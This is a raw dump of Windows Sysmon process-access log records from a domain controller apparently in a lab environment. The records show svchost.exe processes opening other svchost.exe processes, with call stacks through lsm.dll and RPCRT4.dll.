13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.180{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 